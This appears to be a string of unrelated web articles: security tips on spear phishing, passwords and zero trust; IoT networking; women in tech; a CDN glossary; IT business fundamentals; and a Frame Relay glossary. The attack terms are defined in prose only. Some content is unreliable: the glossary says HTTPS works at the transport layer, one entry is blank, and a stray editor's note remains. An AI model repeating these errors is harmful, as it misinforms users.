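One mechanical version of "stop and look" is comparing the From header's display name against the actual sending domain, since spear phishers often borrow a trusted colleague's name over an outside address. A minimal sketch; the trusted-domain set is a made-up example, and real mail filters check far more than this:

```python
from email.utils import parseaddr

def looks_spoofed(from_header, trusted_domains):
    """Flag a From header whose display name claims an identity but whose
    address domain is not on the trusted list. (A header with no display
    name is not flagged by this simple check.)"""
    display, address = parseaddr(from_header)
    domain = address.rsplit("@", 1)[-1].lower() if "@" in address else ""
    return bool(display) and domain not in trusted_domains

trusted = {"example.gov"}
print(looks_spoofed('"IT Helpdesk" <helpdesk@example.gov>', trusted))    # False
print(looks_spoofed('"IT Helpdesk" <helpdesk@evil-mail.biz>', trusted))  # True
```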
KnowBe4 is the world’s most popular integrated platform for awareness training combined with simulated phishing attacks. Let Keller Schroeder show you how KnowBe4 has helped thousands of organizations just like yours manage the continuing problem of social engineering. Contact us today to learn more.
DISCLAIMER : Any non-technical views expressed are not necessarily those of Keller Schroeder or its employee-owners. | <urn:uuid:013d5dfa-4134-461e-89fd-a0de7d586aea> | CC-MAIN-2022-40 | https://www.kellerschroeder.com/news/2022/05/security-tip-of-the-week-sophisticated-spear-phishing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00154.warc.gz | en | 0.942602 | 292 | 2.765625 | 3 |
Government experts at the UK National Cyber Security Centre (NCSC) have concluded that three random words as a password are a safer bet than any more complicated variations.
The NCSC, which is part of GCHQ, concluded that three words provide as much variety as much more complicated and at times convoluted passwords combining numbers, letters and symbols. The simple formula is very difficult for cybercriminals to second guess and is harder for the software they use to crack than the conventional mixed passwords.
The NCSC did add that the key to the success of this system is the unpredictability of the three words: not making the password too personal or obvious is essential.
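The arithmetic behind the advice is easy to check. A sketch, assuming a hypothetical 40,000-word vocabulary and the 95 printable ASCII characters; the point is not that three words always beats a truly random 8-character password in raw entropy, but that the three-word figure is actually achievable and memorable, whereas human-chosen "complex" passwords are rarely random at all:

```python
import math

def entropy_bits(pool_size, picks):
    """Bits of entropy for `picks` independent, uniformly random
    choices from a pool of `pool_size` possibilities."""
    return picks * math.log2(pool_size)

three_words = entropy_bits(40_000, 3)  # three words from a 40,000-word list
mixed_eight = entropy_bits(95, 8)      # 8 printable-ASCII characters
print(f"{three_words:.1f} bits vs {mixed_eight:.1f} bits")
```

Each extra word adds another ~15 bits, so a fourth word comfortably outpaces typical character-based schemes.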
With cybercrime levels reaching record highs during the pandemic it has become even more important than ever to look for new ways to protect personal data from cybercriminals.
The NCSC’s Technical Director, Dr Ian Levy, said: "Traditional password advice telling us to remember multiple complex passwords is simply daft. There are several good reasons why we decided on the three random words approach – not least because they create passwords that are both strong and easier to remember. By following this advice, people will be much less vulnerable to cybercriminals and I’d encourage people to think about the passwords they use on their important accounts, and consider a password manager.”
And just in case we need reminding why this is important, the following stats make for sobering reading. If your data is compromised, weak passwords can have serious consequences, like identity theft. Companies reported a staggering 5,183 data breaches in 2019 that exposed personal information such as home addresses and login credentials that could easily be used to steal your identity or commit fraud. And that pales in comparison with the more than 555 million stolen passwords that hackers on the dark web have published since 2017.
Technology is a field that is often thought of as male-dominated, and though men do seem to be the face of modern technology, women have been innovating, inventing, and leading the way to new advancements for just as long as men have. This Women’s History Month, we want to celebrate just some of these inspiring figures in the history of tech. From the first programmer to one of the inventors of the Internet—and beyond—we’d like to share a timeline of women’s accomplishments in technology. Some of these names are probably familiar to you, but we also hope you learn a little something about our industry.
A Short History of Women’s Contributions in Tech
Ada Lovelace published the first algorithm, to be run by Charles Babbage's Analytical Engine, making her the first computer programmer before a working computer had even been built.
Edith Clarke was an electrical engineer at GE. She invented the Clarke calculator, which could solve line equations with hyperbolic functions ten times faster than any other process.
The women at the Moore School of Engineering set up the Electronic Numerical Integrator and Computer (ENIAC) to calculate bomb trajectories in WWII.
Evelyn Boyd Granville became the second African American woman to receive a Ph.D. in mathematics from Yale University. She used her considerable talents to help with the Apollo space program, including calculating celestial mechanics and trajectories.
Grace Hopper invented FLOW-MATIC, the first data processing language to resemble actual English and a predecessor of the influential programing language COBOL.
Margaret Hamilton is credited with coming up with the term “software engineering.” She led a team that developed the in-flight software for the Apollo missions and Skylab.
Katherine Johnson was instrumental to calculating the launch window for Alan Shepard’s first space flight. Later, the astronaut John Glenn refused to use the numbers calculated for his orbit by electronic computers unless they were verified by Johnson.
Sister Mary Kenneth Keller became the first American woman to receive a Ph.D. in Computer Science. She went on to advocate for the use of computers in education and to encourage women to get involved in computer science.
Radia Perlman invented the spanning tree protocol (STP), one of the foundations of the Internet as we know it.
Shafi Goldwasser received the Gödel Prize in Mathematics for co-inventing probabilistic encryption, the basis for modern data encryption security.
Marissa Mayer was hired as the first female engineer at Google. She became part of the 3-person team who created AdWords (now GoogleAds), Google’s primary revenue generator.
Ruchi Sanghvi became the first female engineer at Facebook. She was instrumental in creating the platform’s News Feed, rolled out in 2006.
Ginni Rometty became the first woman to head IBM, serving as president, chairperson, and CEO.
Gladys West was inducted into the Air Force Space and Missile Pioneers Hall of Fame for her work in developing GPS technology.
These women and their innovations still have an impact on our world today, and this is only a small handful of the incredible minds that shaped technology. We can only begin to imagine what the future holds for today’s women in tech! | <urn:uuid:99ae1e3f-6ab7-4677-86ee-a20b0a41f49c> | CC-MAIN-2022-40 | https://community.connection.com/impact-of-women-in-technology/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00354.warc.gz | en | 0.959247 | 737 | 3.75 | 4 |
It is estimated that there are already 14 billion objects connected to the Internet, so that is currently more than 2 devices per man, woman and child in the world today. Industry analysts are projecting that this could rise to anywhere from 20 billion devices to 100 billion by 2020 and if IoT really takes off in a big way with more connected cars, more wearable tech (both for recreational and healthcare monitoring purposes), and more connected buildings etc., it is easy to see how such growth is going to be achieved. Some may suggest that even 100 billion connected devices is a bit on the conservative side.
In most cases, these devices will act as sensors and, individually, only demand relatively small amounts of network bandwidth to communicate small amounts of data. However, when you scale this up to many millions or billions of connected devices, the demand on the network becomes huge.
Of course, we can expect network capacity to continue increasing but can it realistically keep up with demand to the point where every single device will enjoy an unhindered network experience? I think not. We just have to look at the situation with our home networks. Over the years, our ISPs have doubled, tripled, quadrupled the bandwidth delivered to our homes and yet we still receive complaints (mainly from our offspring) that “the internet is slow” as they try to stream a film, participate in online gaming, Skype with friends etc.
The reality is that we very rarely get anywhere near the full bandwidth promised by our ISPs because the network has to be shared with the other subscribers around us. Now, add in the steady increase in the number of devices we have added to our own wireless networks, first wireless printers, then laptops and smart phones, then tablets and smart TVs. So, a bit like adding an extra lane to a motorway, initially, we enjoy better connection speeds when our ISP ups the available bandwidth but then we add more devices to the network and the benefit is short-lived. Now, if IoT does come to full fruition, we may well be adding another 10 or 20 devices to our home networks, all competing for limited WiFi connectivity.
Consider this situation at a national level: there is going to be a huge proliferation in the number of devices, all vying for the network. So, accepting that network demand is probably going to outstrip supply for the foreseeable future, how can IoT device and systems providers ensure their connected objects are going to work well over congested and contested networks? Well, no matter how elegantly a device is designed – no matter how well it performs within the safety and comfort of the test lab – it must cope with the issues of operating over real and potentially hostile networks. Devices that cannot tolerate adverse network conditions will result in frustrated customers and damaged reputations for the supplier.
What will separate many of these devices from even our mobile phone experiences is that they will be operator-less. Unlike a mobile app where, if it doesn’t work, you might change location or even network, these devices and their centralised controlling software will have to implement a strong autonomous recovery approach in the event of the inevitable network issues they will face.
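A common building block for that kind of autonomous recovery is retry with exponential backoff and jitter, so that a device neither gives up at the first dropped packet nor hammers an already congested network. A minimal sketch; `send` here stands in for whatever network call the device actually makes:

```python
import random
import time

def send_with_backoff(send, retries=5, base_delay=0.5, sleep=time.sleep):
    """Try `send()` up to `retries` times, doubling the delay (plus
    random jitter) after each failure before trying again."""
    for attempt in range(retries):
        try:
            return send()
        except ConnectionError:
            if attempt == retries - 1:
                raise  # recovery failed; surface the error
            delay = base_delay * (2 ** attempt) * (1 + random.random())
            sleep(delay)

# Simulate a flaky network that fails twice before succeeding.
attempts = {"n": 0}
def flaky():
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise ConnectionError("network congested")
    return "telemetry accepted"

print(send_with_backoff(flaky, sleep=lambda _: None))  # telemetry accepted
```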
In order to achieve this tolerance or resilience IoT suppliers need to accept that they can’t improve the public networks over which their connected devices will need to operate but it is in their remit to improve their device’s tolerance and resilience by first fully understanding how it performs in the real world networked environment and knowing the point at which the device is likely to fail.
If they are armed with this information at every stage of the development and deployment process, they will be able to engineer tolerance and resilience into the final product. iTrinegy's virtual test networks provide an ideal testbed in which to properly assess and manage risk throughout the development and deployment of your IoT systems.
Cybercrime, phishing attempts, and security hacks are all on the rise worldwide. These data breaches can be costly to businesses and individuals. They leech your valuable time, energy, and information, as well as revenue and finances. Over the next five years, the cost of cybercrime is expected to rise by 15% per year. If trends continue as expected, this will lead to a $10.5 trillion cost annually by 2025.
Enter zero trust cybersecurity. Zero trust is an attempt to meet the moment globally. Zero trust methodology aims to address both the constantly evolving methods of cybercriminals, as well as the shifting needs of businesses, governments, and consumers.
What is Zero Trust Cybersecurity?
Zero trust is similar to a zero tolerance policy, in that it assumes risk can come from anywhere, at any time. Most traditional security models grant some kind of lasting trust to users logging in from recognized networks, locations, or IP addresses. The zero trust model, however, assumes there is no network edge, and therefore that no user or device can be granted lasting trust.
Instead, zero trust requires that all users, whether inside or outside an organization's network, have their credentials constantly checked, authenticated, and validated. This continual reauthorization is necessary before accessing or downloading any files, applications, or data within the protected network.
Origins of Zero Trust
Zero trust was invented by John Kindervag, widely considered one of the world’s foremost cybersecurity experts. Kindervag is currently Field CTO with Palo Alto Networks after years at Forrester Research. The creation of the zero trust model is attributed to his field work as a cybercrime analyst. It has since been adopted by Google, Coca Cola, many airlines, and more.
Notably, the zero trust model has also been recommended by the US House of Representatives. After the disastrous OPM data breach, the House issued an official recommendation that all government agencies adopt the zero trust model.
Example of a Zero Trust System
To understand how zero trust works, Google has compared the model to going to the airport. Traditionally, at the airport, you must present your identification and ticket to security before accessing the gates. This would be the equivalent of sharing your IP address (like a passport, to prove who you are), as well as your authorized destination (your ticket, showing where you plan to go). In a zero trust model, every time you log in, you must show these credentials and have them be authenticated. Similarly, every time you fly, you have to present the same proofs, even if you have flown from that airport, and to the same destination, before. This re-authentication is what sets zero trust apart from traditional network security, which assumes that users who have logged in (or checked in) once before can continue to be trusted.
Additionally, gate access is restricted in the zero trust model, under this airport metaphor. Gone would be the option to wander freely from gate to gate, once you have presented your credentials once at security. Instead, even authorized users can only access the specific applications and destinations that they requested upon entry. This extra step limits the amount of damage that an impersonator would be able to do, assuming that they were able to evade detection at the initial checkpoint.
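The gate-by-gate model can be sketched as a per-request authorization check. All names here are hypothetical; the point is that no session survives between requests, and a credential only ever unlocks the one resource it was issued for:

```python
# Minimal zero-trust sketch: every request re-validates the credential,
# and a token grants access only to the single resource it names.
VALID_CREDENTIALS = {"alice-token": "payroll-db"}  # token -> permitted resource

def authorize(token, resource):
    """Re-check the credential on every request; deny anything else."""
    return VALID_CREDENTIALS.get(token) == resource

print(authorize("alice-token", "payroll-db"))   # True: right gate
print(authorize("alice-token", "hr-files"))     # False: wrong gate, same token
print(authorize("stolen-token", "payroll-db"))  # False: unknown credential
```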
Differences Between Zero Trust and VPN Networks
Both VPNs and zero trust can be deployed to enable remote users to access confidential materials. This makes both systems especially helpful as more companies continue to ask employees to work from home. Both VPNs and zero trust models are attempts to manage the increased risk from having so many different remote access points.
However, VPNs and zero trust security manage this risk in different ways. A VPN creates a remote perimeter. It grants access to all authorized users and managed devices who log in through the VPN. Zero trust, by contrast, automatically restricts access to all users, assuming there is no trusted network.
While zero trust is a newer concept in cybersecurity, and thus less proven than VPN technology, it is an attempt to restrict the amount of damage that a hacker can do, once they have gained access to the trusted network created by the VPN.
Benefits of Zero Trust
Zero trust upends the traditional perimeter security model by restructuring the framework of risk. Some benefits include:
- Portability – The zero trust model can be accessed by users all over the globe. Gone are the physical limitations of needing a dedicated office space and company network.
- Flexibility – A zero trust model has less initial set up for users than requesting access to a VPN, minimizing onboarding time.
- Security – Zero trust is designed to limit the damage, or “blast radius,” if a breach does occur, rather than relying on a hard network perimeter.
- Invisibility – Despite the multiple authentications necessary, zero trust should be seamless for users. They should be able to sign in and use a strong second factor in order to conduct business as usual.
Evolution of Zero Trust Security
As more businesses and users utilize hybrid cloud technology to store data, zero trust is a necessary evolution within the cybersecurity landscape to help mitigate the associated increased risk. When done correctly, zero trust lives up to its motto of “never trust, always verify” and can create a stronger, safer online experience for companies, governments, and individuals. | <urn:uuid:29449a84-e8c9-44a6-8352-3ffbc4209398> | CC-MAIN-2022-40 | https://news.networktigers.com/opinion/zero-trust-what-it-is-and-why-it-matters/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00354.warc.gz | en | 0.946944 | 1,087 | 2.875 | 3 |
Amplified DDoS attacks
Amplification refers to a set of methods to increase the volume of attacks, typically through the abuse of non-suspecting third-party servers. A good example of such amplification is DNS amplification, in which queries are made to DNS servers that resolve domain names into IP addresses. When the UDP protocol is used, the source IP of queries made to DNS servers is not verified. An attacker can therefore make a short request that yields a much longer response, while providing the IP address of the attack target instead of the real IP making the request. The DNS server will send a response, which may be 10 or even 50 times longer than the query, to the attack target. Attackers can thus vastly increase the impact of their attacks.
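The multiplier described above is just a ratio of packet sizes. A sketch with illustrative numbers; real figures vary with the query type and the server's configuration:

```python
def amplification_factor(request_bytes, response_bytes):
    """How many bytes hit the victim per byte the attacker sends."""
    return response_bytes / request_bytes

# e.g. a ~60-byte DNS query that triggers a ~3000-byte response
print(f"{amplification_factor(60, 3000):.0f}x")  # 50x
```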
API stands for Application Programming Interface. An API is a software intermediary that allows two or multiple software applications to talk to each other. It also allows extension mechanisms so that users are able to extend current functionality in various ways.
Also See: CDN Pro
Application acceleration is a network solution focus around maximizing web application’s speed for end users. Application acceleration is used for issues like WAN latency, bandwidth congestion. Applications that require extensive interactive content, this technology allows quick rendering and increase loading speed that could meet user expectation.
Also see: Enterprise Solutions
A Backdoor is a type of malware which bypasses or negates normal authentication procedures for the purpose of accessing a system illicitly. Remote access is thus permitted to system resources, such as databases and file servers, allowing perpetrators to issue system commands and update the malware remotely.
“Big data” is a term to describe data sets that are too large or too complex to be processed or analysed by traditional data-processing application software. Currently, it tends to refer the use of data analytics methods or user behavior analytics that need to extract value from data.
Brute Force Attacks
Brute Force attacks are automated attempts to access restricted resources, such as user accounts, by trying to log in or access the resource again and again with incremental tiny variations of usernames, passwords or other parameters.
Cache is a hardware or software component that stores data thus future requests for that data can be served faster. Caching is at the core of content delivery network (CDN) services. CDN copies website content to proxy servers which are optimized for content distribution.
CDN (Content Delivery Network)
A content delivery network (CDN) refers to geographically distributed large network of proxy servers and data centers. CDN is to provide high availability and good performance by distributing content spatially relative to end users. Companies across different verticals employ CDN to deliver media (such as video, audio and streaming), HTTP content, and download files.
Also see: How Content Delivery Network Works
Most operators find CDN solutions are fundamental for delivering the services and contents to keep pace with the growing demand for streaming media, online gaming. CDN services provide a cost effective solution. Without CDN, it is impossible to satisfy consumers’ need for fast and secured online experience from any device.
For network operators who want to benefit from CDN without managements CDNetworks offers leading solutions for CDN services. For developers who want to take charge of their own CDN and be more flexible with the cost and performance, CDNetworks offers CDN Pro with our unique self-serving features.
A Credential Stuffing attack is a variant of Brute Force. In these cases, the attacker already has a list of user names, emails and passwords, typically stolen or leaked from a site or service. This list is used to try and access accounts on a different site or service, leaning on the fact that users tend to re-use passwords on multiple services.
Credit Card Stuffing (Carding)
Similar to Credential Stuffing, in which passwords stolen from one site or service are used on another one, Carding uses stolen credit card information from one site or service to run an automated process to verify each card’s validity by charging small amounts on the checkout page or via the API of a different site.
Cross Site Scripting (XSS)
Data Leakage Protection (DLP)
The term Data Leakage Protection refers, generally, to tools and services that typically monitor outbound data and make sure that it does not contain Sensitive Data Exposure, or a leakage of information into the wrong hands. Such tools typically block the flow of outgoing data or remove the sensitive information from it. A good WAF should contain a module for outbound data inspection.
A Dictionary Attack is a “softer” version of a Brute Force attack in which the access attempts are based on dictionaries of commonly used passwords, such as “1234”, to locate and penetrate accounts or other resources with weak passwords.
Distributed Denial of Service attacks (DDoS)
DDOS attacks are attacks with various methods designed to take a site or an online service down and make it inaccessible to users. One common method is directing a large number of requests simultaneously at the target website so that it becomes overwhelmed and exhausts its resources.
Domain Name System (DNS)
The domain name system (DNS) is a naming convention for computers, services, or any other system or resource on the Internet or in a private network. Essentially, domain names are translated into IP addresses for the purposes of routing traffic and identifying users worldwide.
See also: DNS Security
HTTPS & HTTPS
Hypertext Transfer Protocol (HTTP) is an application-layer protocol for transmitting hypermedia files, such as HTML. It was designed for communication between web browsers and web servers. HTTP is the foundation of data communication for the World Wide Web, where hypertext documents (e.g. hyperlinks) can be accessed by users easily. Hypertext Transfer Protocol Secure (HTTPS) is an extension of HTTP. It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is encrypted using Transport Layer Security.
- HTTP is unsecured while HTTPS is secured.
- HTTP operates at application layer, while HTTPS operates at transport layer and uses TLS/SSL certificate to ensure authentication..
See also: How to distribute and utilize videos
Images and Resolutions
Resolutions refers to the sharpness and clarity of an image. It often used to describe monitors, printers, and bit-mapped graphic images. Websites with plain texts are rarely seen these days. Images can improve engagement, due to higher resolution screens image size has increased. Therefore, website performance is slowed down by high resolution images.
Also see: Web Performance
Infrastructure as a Service (IaaS)
Infrastructure as a service (IaaS) is a form of cloud computing that provides virtualized computing resources over the internet. Traditional IT infrastructure such as server hardware are provided by the cloud and it reduced the requirement for purchasing and maintaining private IT infrastructure. Alongside IaaS, software as a service (SaaS) and platform as a service (PaaS), are the three main categories of cloud computing.
Injections refers to adding (or “injecting”) commands to inputs that a software application or a SaaS expects to receive from users, such as on forms, or APIs, with the intention that these commands will be executed by an underlying component or service, gaining control over that component, extracting data from it, or other malicious acts.
this obviates the need for “etc.” because it indicates that the following are examples.
Load balancing refers to the process of distributing requests and tasks over a set of servers, which aims to make the overall processing more efficient. As a result, avoiding a single server becomes overwhelmed by web traffic.
Man in the Browser (MitB)
Man in the Browser attacks are almost identical to MitM attacks, but instead of being located somewhere on the network between the two parties, the attacker penetrates the browser of one party, typically by using a malicious browser extension or an app installed on that user’s device. This access to the user’s browser allows the 3rd party to eavesdrop or modify data exchanged between the user and a website.
Man in the Middle (MitM)
In a Man in the Middle attack, a hacker intercepts the traffic between two communicating parties. In some cases, such an infiltrator would need to pass the messages between the parties and thus to pretend to be the first party when communicating a message to the second one and vice versa. Such an interception can be used either to eavesdrop and/or to modify the data sent between the parties. Generally, a combination of encryption (such as TLS/SSL) and certificates are used to prevent this.
Media streaming is video and audio content over the Internet being constantly received and presented to viewers. Media files are normally managed by media companies.
See also: Media Delivery
OWASP Top 10
OWASP stands for the Open Web Application Security Project. It is a global non-profit foundation of security specialists and other volunteers, famous for publishing a list of the highest security risks for web applications, known as “OWASP Top 10”.
Protocol DDoS Attacks
These attacks target weaknesses in protocols such as TCP/IP (network layer attacks) and HTTP (application layer attacks) or their implementations. Typically, these attacks exploit scenarios in which a server gets a packet or a request from a computer and will expect further communication. The server allocates memory and resources to maintain the session state and the communication channel, which is abused by intentionally slowing down or halting communication and draining such resources.
Web Scraping is an automated process designed to extract public data from websites by making multiple requests to different web pages or resources. Scraping can be categorized as an exploitation of computer resources and of business data, but is not an “attack” per se, since typically the scraped data is exposed to users and not restricted.
Software Defined WAN (SD-WAN) is the next generation of WANs: It offers a completely new way of managing and operating your WAN infrastructure. This managed, secure, SD-WAN connectivity solution delivers seamless connections and optimised user experience without sacrificing security.
SD-WAN addresses to many IT challenges. This approach to network connectivity can lower operational costs significantly and improve resource usage for mult-isite deployment. Bandwidth can be used more efficiently by network administrators and it can help ensure high levels of performance for critical applications without compromising security or data privacy.
Also see: What SD-WAN means for your Business
Sensitive Data Exposure (Data Leakage)
A sensitive data leakage refers to a security breach incident category, rather than a specific type of vulnerability or attack. Such an incident takes place whenever a site or a service is exploited already and sends sensitive data into the wrong hands. The data typically includes personal identifying information, credit card numbers, financial information or other private data.
SQL Injection (SQLi)
SQL Injection is a common type of Injection, in which the attacker sends SQL commands to a software application or site interface to target a Database Server that may be serving the software or service being hacked.
Video Streaming is the transmission of video files from a server to a viewer continuously. Therefore, online video is transferred in real time as is consumed. Streaming is opposite to downloading. Streaming happens in real-time. If a video file is downloaded, viewer needs to safe a copy of that entire file on the device and video cannot play until downloading finishes. Whereas, if a video file is streamed, it is played without actually copying any files.
See also: Media Acceleration Live Broadcast
VOD refers to Video On Demand. VOD is a media distribution system that allows viewers to access videos without traditional video entertainment device or static broadcasting schedule. Videos can be downloaded to devices for continued viewing, or can be streamed.
Also see: Media Acceleration
Virtual machine (VM) is software and emulates a computer system. VM is based on computer architectures and provides computer or server functions. Its implementation involves specialized hardware, software, or a combination.
Virtual Private Server (VPS)
A virtual private server (VPS) is a virtual machine that used as a server such as providing processing power to client machines. VDS (virtual dedicated server) also means the same.
Volumetric DDoS Attacks
These attacks, measured either in Gigabits (or even Terrabits) of inbound traffic per second in the network layer or HTTP/s requests per second in the application layer, typically use distributed resources, such as hijacked computing devices and botnets,. to generate more traffic then the targeted system can absorb. Network layer attacks (L3/L4) typically target the network capacity with a flood of “meaningless” network packets while Application layer attacks (L7) target server resources such as memory or Input/Output capacities through a flood of requests that will be executed and responded by the attacked servers, until systems resources are exhausted. | <urn:uuid:c3922f6c-d7dc-4605-a859-76b0731d2a0e> | CC-MAIN-2022-40 | https://www.cdnetworks.com/glossary/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00354.warc.gz | en | 0.91569 | 2,854 | 2.859375 | 3 |
The role of IT has transformed from business supporter to business enabler to full-fledged business partner. This is reflected in ITIL v3, which places priority on managing IT services according to business needs. With this increased emphasis on alignment and communication between IT and the business, it is more important than ever that technically-proficient IT practitioners also understand the disciplines that make up the business.
The following overview will not immediately qualify anyone for an MBA. But it provides some initial insight into 10 aspects of business that are essential for IT practitioners to understand. So whether you aspire to be CIO, create the newest internet startup, take the lead in developing an enterprise application, or just get a leg up in your career, it’s not enough to just know technology. You must also know business.
Accounting is the process of collecting, classifying, interpreting, and reporting performance data, usually financial in nature. An accountant utilizes tools such as a balance sheet, income statement, and a cash flow statement to report and analyze the result of business activities. These are commonly known as financial statements.
Accounting, however, is not limited to the world of financial data. IT practitioners also may use similar processes to better understand their computing environments. For example, several operating systems have an accounting function that collects usage data. Similar functionality exists in local- and wide-area network management tools. This IT accounting data is useful for auditing, trend analysis, capacity planning, chargeback, and cost allocation.
Economics focuses on the study of supply and demand and the allocation of resources. A basic understanding of economic theory can be a useful tool in managing your IT organization. For example, can you accurately predict demand for your support desk? This may be vital to proper staffing levels, which if set too high may exceed your budget, or if too low, affect customer satisfaction.
If you run your IT shop as a profit center, here is a tip that may help you set the appropriate pricing levels. What is the “switching cost” of your customers? In other words, how easily can a customer change to a competing product or service without disrupting their business? If the switching cost is high, prices can often be raised to a certain point without fear of losing the customer, at least in theory.
Although IT practitioners may not be concerned with financial issues on a day-to-day basis, understanding financial concepts may be crucial to their role and career. Finance is generally concerned with the management of money. Often called both an art and a science, finance looks at an investment or capital expenditure and then determines the potential return or profit using a variety of techniques.
Within your IT organization, you may have performed financial tasks perhaps more often than you realize. Have you ever proposed a new technology project or the replacement of a legacy system? You probably had to include some sort of analysis as to why that money should be spent.
The IT practitioner may think of a project in qualitative terms such as reducing support costs or increasing capability. A financial manager, however, will look at the project quantitatively by analyzing the cost of making the investment—including the source of funds—and the potential return in terms of added value to the company (known as return on equity) or increased profitability (known as return on capital).
Most corporate IT organizations today operate globally and/or work with partners from around with world. Large IT shops, in particular, routinely work with offshore developers, international customers and team members in multiple time zones.
Even if your organization is local in scope, knowledge of international business is essential. Your business may have a contact center that operates in another country. It may use contract labor from a developing market. And your company is almost certainly looking to export goods overseas. | <urn:uuid:b87889ba-6025-48fd-a166-daa1fa5ef617> | CC-MAIN-2022-40 | https://cioupdate.com/understanding-the-10-fundamentals-of-any-business-3/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00354.warc.gz | en | 0.951968 | 780 | 2.640625 | 3 |
This document defines common Frame Relay terms.
There are no specific requirements for this document.
This document is not restricted to specific software or hardware versions.
For more information on document conventions, see the Cisco Technical Tips Conventions.
access line—A communications line (for example, a circuit) interconnecting a Frame-Relay-compatible device (DTE) to a Frame Relay switch (DCE). See also “trunk line” below.
access rate (AR)—The data rate of the user access channel. The speed of the access channel determines how rapidly (the maximum rate) that the end user can inject data into a Frame Relay network.
American National Standards Institute (ANSI)—A private, non-profit organization that administers and coordinates the U.S. voluntary standardization and conformity assessment system by devising and proposing recommendations for international communications standards. See also “International Telecommunication Union Telecommunication Standardization Sector” (ITU-T, formerly Consultative Committee for International Telegraph and Telephone [CCITT]) below.
backward explicit congestion notification (BECN)—A bit sent in the direction opposite to the data flow. It is set by a Frame Relay network to notify an interface device (DTE) that congestion avoidance procedures should be initiated by the sending device.
bandwidth—The range of frequencies, expressed in kilobits per second (kbps), that can pass over a given data transmission channel within a Frame Relay network. The bandwidth determines the rate at which information can be sent through a channel: the greater the bandwidth, the more information that can be sent in a given amount of time.
bridge—A device that supports LAN-to-LAN communications. Bridges may be equipped to provide Frame Relay support to the LAN devices that they serve. A Frame-Relay-capable bridge encapsulates LAN frames in Frame Relay frames and feeds those Frame Relay frames to a Frame Relay switch for transmission across the network. A Frame-Relay-capable bridge also receives Frame Relay frames from the network, strips the Frame Relay frame off each LAN frame, and passes the LAN frame on to the end device. Bridges are generally used to connect LAN segments to other LAN segments or to a WAN. They forward traffic based on the Layer 2 (L2) LAN protocol (for example, the MAC address), which occupies the lower sublayer of the LAN Open System Interconnection (OSI) data-link layer. See also “router” below.
burstiness—In the context of a Frame Relay network, data that uses bandwidth only sporadically; that is, information that does not use the total bandwidth of a circuit 100 percent of the time. During pauses, channels are idle and no traffic flows across them in either direction. Interactive and LAN-to-LAN data is bursty in nature because it is sent intermittently. Between data transmissions, the channel experiences idle time while waiting for the DTE to respond to the transmitted data and for the user to send more input.
channel—Generally, channel refers to the user access channel across which Frame Relay data travels. Within a given T1 or E1 physical line, a channel can be one of the following, depending upon how the line is configured:
unchannelized—The entire T1 or E1 line is considered a channel, where the following is true:
The T1 line operates at speeds of 1.536 Mbps and is a single channel consisting of 24 T1 time slots.
The E1 line operates at speeds of 1.984 Mbps and is a single channel consisting of 30 or 31 E1 time slots, depending upon the application.
channelized—The channel is any one of n time slots within a given line, where the following is true:
The T1 line consists of any one, or more, channels. Each channel is any one of 24 time slots. The T1 line operates at speeds in multiples of 56 or 64 kbps, up to 1.536 Mbps, with aggregate speed not exceeding 1.536 Mbps.
The E1 line consists of one or more channels. Each channel is any one of 30 or 31 time slots. The E1 operates at speeds in multiples of 64 Kbps to 1.984 Mbps, with aggregate speed not exceeding 1.984 Mbps.
fractional—The T1 or E1 channel is one of the following groupings of consecutively or non-consecutively assigned time slots:
n T1 time slots (n × 56 or 64 kbps, where n is equal to 1 to 23 T1 time slots per T1 channel).
n E1 time slots (n × 64 kbps, where n is equal to 1 to 30 time slots per E1 channel).
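The time-slot arithmetic described in the channel entry above can be sketched in a few lines of Python. The function name and example values are illustrative assumptions, not taken from Cisco documentation.

```python
# Sketch of the time-slot arithmetic for channelized and fractional
# T1/E1 channels: bandwidth = (number of assigned time slots) x slot rate.

def channel_bandwidth_kbps(time_slots: int, line: str = "T1", slot_rate_kbps: int = 64) -> int:
    """Return the bandwidth in kbps of a channel built from n time slots."""
    max_slots = {"T1": 24, "E1": 31}  # maximum assignable time slots per line
    if line not in max_slots:
        raise ValueError("line must be 'T1' or 'E1'")
    if not 1 <= time_slots <= max_slots[line]:
        raise ValueError(f"{line} channels use 1 to {max_slots[line]} time slots")
    return time_slots * slot_rate_kbps

# Unchannelized T1: all 24 time slots, 24 x 64 kbps = 1536 kbps (1.536 Mbps)
print(channel_bandwidth_kbps(24, "T1"))  # 1536
# Fractional E1: 6 of the available time slots, 6 x 64 kbps = 384 kbps
print(channel_bandwidth_kbps(6, "E1"))   # 384
```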
channel service unit (CSU)—An ancillary device needed to adapt the V.35 interface on a Frame Relay DTE to the T1 (or E1) interface on a Frame Relay switch. The T1 (or E1) signal format on the Frame Relay switch is not compatible with the V.35 interface on the DTE; therefore, a CSU or similar device, placed between the DTE and the Frame Relay switch, is needed to perform the required conversion.
committed burst size (Bc)—The maximum amount of data (in bits) that the network agrees to transfer, under normal conditions, during a time interval Tc. See also “excess burst size (Be)” below.
Consultative Committee for International Telegraph and Telephone (CCITT)—See “International Telecommunication Union Telecommunication Standardization Sector (ITU-T)” below.
committed information rate (CIR)—The rate at which a Frame Relay network agrees to transfer information under normal conditions, averaged over time interval Tc. CIR, measured in bits per second (bps), is one of the key negotiated tariff metrics.
committed rate measurement interval (Tc)—The time interval during which the user can send only Bc-committed amount of data and Be-excess amount of data. In general, the duration of Tc is proportional to the burstiness of the traffic. Tc is computed (from the subscription parameters of CIR and Bc) with the formula Tc = Bc ÷ CIR. Tc is not a periodic time interval. Instead, it is used only to measure incoming data, during which it acts like a sliding window. Incoming data triggers the Tc interval, which continues until it completes its computed duration. See also “committed information rate (CIR)” and “committed burst size (Bc)” above.
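The formula above, Tc = Bc ÷ CIR, can be illustrated with a short Python sketch; the subscription values used here are hypothetical examples, not figures from the source.

```python
# Sketch of the committed rate measurement interval: Tc = Bc / CIR.

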